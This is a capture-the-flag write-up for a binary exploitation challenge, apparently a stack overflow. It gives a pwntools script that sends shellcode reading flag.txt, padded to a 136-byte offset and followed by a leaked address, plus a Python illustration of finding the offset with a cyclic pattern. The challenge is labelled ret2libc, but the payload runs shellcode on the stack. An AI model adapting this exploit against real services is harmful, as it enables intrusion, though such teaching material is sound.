Where do u came from
Category: Pwn
Author: Kirubahari
Challenge Description
Ret2libc attack
Solution
Steps
Find the offset to the return address by running the binary in the debugger with a cyclic pattern as input.
The return address is given by the binary itself.
Combining the two gives the exploit.
Tools Used
gdb
python
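#!/usr/bin/python3
from pwn import *

# asm() needs the target architecture; amd64 is assumed here because the payload uses p64()
context.arch = "amd64"

# "IP" and port are placeholders for the challenge host and port
port = 0
io = remote("IP", port)

# The binary prints the address after ": "; read its 14 characters as hex
io.recvuntil(b": ")
addr = int(io.recv(14), 16)

# Shellcode first, padding up to the 136-byte offset, then the leaked address
shellcode = asm(shellcraft.cat("flag.txt"))
payload = shellcode + cyclic(136 - len(shellcode)) + p64(addr)
io.sendline(payload)
io.interactive()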
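How the cyclic pattern from the first step turns a crash value into the offset 136, shown as an added example that is not part of the original write-up. It uses plain Python instead of pwntools, and the "crash" is simulated on a constructed pattern; the function names are made up for this illustration.

```python
import string

def de_bruijn(alphabet: bytes, n: int) -> bytes:
    """Return a de Bruijn sequence: every n-byte window occurs exactly once."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = bytearray()

    def db(t: int, p: int) -> None:
        if t > n:
            if n % p == 0:
                out.extend(alphabet[i] for i in a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(out)

def simulate_overwrite(pattern: bytes, ret_offset: int) -> int:
    """Model the crash: the 8 pattern bytes at ret_offset end up in the saved
    return address and appear in the debugger as a little-endian integer."""
    return int.from_bytes(pattern[ret_offset:ret_offset + 8], "little")

def find_offset(pattern: bytes, crashed_value: int, n: int = 4) -> int:
    """Map the value seen at the crash back to its position in the pattern."""
    needle = crashed_value.to_bytes(8, "little")[:n]
    return pattern.find(needle)

# Constructed input: 200 bytes of pattern over a-z with 4-byte windows
PATTERN = de_bruijn(string.ascii_lowercase.encode(), 4)[:200]
RET_OFFSET = 136  # the offset used in the write-up's payload

if __name__ == "__main__":
    value = simulate_overwrite(PATTERN, RET_OFFSET)
    print(hex(value), "->", find_offset(PATTERN, value))
```

Because every 4-byte window in the pattern is unique, the bytes found in the return address identify exactly one position in the input, which is the padding length the payload needs before the address.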
Flag
FLAG{ret2libc}
Flag
Dynamic Flag